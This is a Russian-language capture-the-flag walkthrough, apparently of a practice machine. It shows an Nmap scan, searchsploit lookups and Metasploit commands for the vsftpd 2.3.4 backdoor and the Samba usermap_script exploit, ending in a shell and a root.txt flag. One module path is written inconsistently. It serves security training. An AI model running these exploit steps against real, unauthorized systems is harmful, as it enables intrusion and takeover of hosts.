Первый сбор информации, Nmap - отличный инструмент для получения всей информации об услугах, портах и многом другом.
Команда:
Код:
Nmap -sV -sC -A -oN name.txt ipaddress
Из сканирования Nmap мы узнали, что он использует уязвимый ftp-сервис версии vsftpd 2.3.4 и порт, который он использует, также открыт, он также имеет ssh сервис, но он не был уязвим, была служба NetBIOS и версия ПО samba выглядела уязвимой.
Мы попытались использовать FTP и нам удалось войти в ящик.
Команда:
Код:
ftp <ip-address>
Это было не так уж и полезно, поэтому мы продвинулись вперед с нашей другой важной информацией, мы узнали из информации Nmap сканирования, что ftp версия является уязвимой, поэтому мы попытались найти эксплойт для этой версии, мы использовали searchsploit, чтобы предложить некоторые хорошие эксплойты.
Команда:
Код:
searchsploit vsftpd 2.3.4
Searchsploit предложил несколько эксплойтов, мы искали больше эксплойтов во фреймворке Metasploit и нашли хороший эксплойт
Код:
exploit/unix/ftp/vsftpd_234_backdoor
Для выполнения этого эксплойта мы использовали простые команды Metasploit
Код:
use exploit/unix/vsftpd_234_backdoor
show options // для просмотра параметров, доступных для этого эксплойта
Код:
set RHOST ipaddress
exploit
После того, как мы попробовали этот эксплойт несколько раз, мы не нашли ничего полезного, поэтому мы попытались найти другое уязвимое программное обеспечение в окне, мы нашли версию samba уязвимой, поэтому мы проверили эту версию samba на наличие эксплойтов в searchsploit.
Команда:
Код:
searchsploit 3.0.20
Мы находим некоторые предложения по эксплойтам, мы выбираем тот, который с фреймворком Metasploit, мы использовали
Код:
exploit/multi/samba/usermap_script
Для запуска этого эксплойта, мы использовали простые команды Metasploit,
Код:
use exploit/multi/samba/usermap_script
show options
set RHOST ipaddress
exploit
Через несколько секунд мы получили нашу оболочку, откуда нашли наш флаг в текстовом файле под названием root.txt.
Ссылка скрыта от гостей